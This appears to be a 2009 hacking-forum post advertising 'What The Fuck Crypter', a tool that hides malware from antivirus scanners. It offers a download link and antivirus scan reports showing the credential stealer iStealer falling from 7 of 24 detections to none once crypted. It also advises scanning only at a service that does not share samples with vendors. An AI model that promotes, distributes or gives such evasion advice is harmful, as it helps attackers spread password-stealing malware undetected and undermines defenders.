He is called What The Fuck Crypter & he can crypt runtime/scantime full undetected.
Screenshot:
Scan of the crypter + stub:
Scan of iStealer v5.0.1 before:
Scan of iStealer v5.0.1 after:
Download:
/!\ Scan only at NoVirusThanks.org and tick "don't distribute the sample"/!\
Screenshot:
Scan of the crypter + stub:
Código:
File Info Report generated: 17.11.2009 at 19.13.05 (GMT 1) Filename: WTFCrypterv1.0byPinkHat.rar File size: 30381 MD5 Hash: 9818f3478991d7d6b63570a45391659f SHA1 Hash: 12E79ED0E0DFDDE1093BFAFBC563DBF6560B248F Self-Extract Archive: Nothing found Binder Detector: Nothing found Detection rate: 2 on 24 Detections a-squared - Trojan-PWS.Win32.Prostor.A!IK Avira AntiVir - - Avast - - AVG - - BitDefender - - ClamAV - - Comodo - - Dr.Web - - Ewido - - F-PROT6 - - G-Data - - Ikarus T3 - - Kaspersky - - McAfee - - NOD32 v3 - Win32/Injector.EQ Norman - - Panda - - QuickHeal - - Solo Antivirus - - Sophos - - TrendMicro - - VBA32 - - VirusBuster - - ZonerAntivirus - - Scan report generated by Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Código:
File Info Report generated: 17.11.2009 at 19.11.21 (GMT 1) Filename: iStealer5.0.1.exe File size: 1851392 MD5 Hash: 654bb0241e3b6baa878091dabb608934 SHA1 Hash: 5BC0FCE8850AA8BC67D8802DDE43F2F99F042EB2 Self-Extract Archive: Nothing found Binder Detector: Nothing found Detection rate: 7 on 24 Detections a-squared - Trojan-Dropper.MSIL!IK Avira AntiVir - TR/Drop.MSIL.Agent.XW Avast - - AVG - - BitDefender - - ClamAV - - Comodo - - Dr.Web - - Ewido - - F-PROT6 - - G-Data - Trojan-Dropper.MSIL.Agent.xw A Ikarus T3 - - Kaspersky - Trojan-Dropper.MSIL.Agent.xw McAfee - - NOD32 v3 - MSIL/TrojanDropper.Agent.A Norman - - Panda - - QuickHeal - TrojanDropper.MSIL.Agent.xw Solo Antivirus - - Sophos - Troj/Mdrop-CIB TrendMicro - - VBA32 - - VirusBuster - - ZonerAntivirus - - Scan report generated by Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Código:
File Info Report generated: 17.11.2009 at 19.14.54 (GMT 1) Filename: iStealer5.0.1-crypted.exe File size: 1863732 MD5 Hash: 92ee71f5b4264ff7a6960ad19895bbd8 SHA1 Hash: 05F322EEB249E0773007F6641F5C12DD97A65221 Self-Extract Archive: Nothing found Binder Detector: Nothing found Detection rate: 0 on 24 Detections a-squared - - Avira AntiVir - - Avast - - AVG - - BitDefender - - ClamAV - - Comodo - - Dr.Web - - Ewido - - F-PROT6 - - G-Data - - Ikarus T3 - - Kaspersky - - McAfee - - NOD32 v3 - - Norman - - Panda - - QuickHeal - - Solo Antivirus - - Sophos - - TrendMicro - - VBA32 - - VirusBuster - - ZonerAntivirus - - Scan report generated by Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
/!\ Scan only at NoVirusThanks.org and tick "don't distribute the sample"/!\
Código:
http://adf.ly/21Ns